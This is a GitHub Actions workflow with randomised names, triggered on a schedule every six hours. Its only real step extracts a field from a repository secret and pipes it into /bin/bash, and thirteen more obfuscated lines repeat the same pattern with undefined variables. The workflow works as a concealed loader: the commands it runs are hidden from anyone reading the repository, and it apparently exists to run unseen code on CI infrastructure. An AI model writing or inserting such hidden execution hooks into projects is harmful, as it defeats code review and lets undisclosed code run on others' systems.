name: jiangkaishen3198

on:
  workflow_dispatch:
  schedule:
    - cron: '46 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiangkaishen3198
        env:
          s1538: ${{ secrets.s1538 }}
        run: |
          echo $s1538 | jq -r .vaugm66557 | /bin/bash
          echo $y163 | jq -r .br5744 | /bin/bash
          echo $oo14633 | jq -r .omeyh3580 | /bin/bash
          echo $xtdab7 | jq -r .i33 | /bin/bash
          echo $v8587 | jq -r .zbz65 | /bin/bash
          echo $v65336 | jq -r .p3 | /bin/bash
          echo $olykp0 | jq -r .gozd54 | /bin/bash
          echo $er4 | jq -r .pkjel884 | /bin/bash
          echo $k05287 | jq -r .icfu7025 | /bin/bash
          echo $u4325 | jq -r .dd67125 | /bin/bash
          echo $cdid8 | jq -r .ms4 | /bin/bash
          echo $jyza2 | jq -r .l62 | /bin/bash
          echo $dhqx66186 | jq -r .rbpyt6630 | /bin/bash
          echo $u64 | jq -r .vshgp61196 | /bin/bash

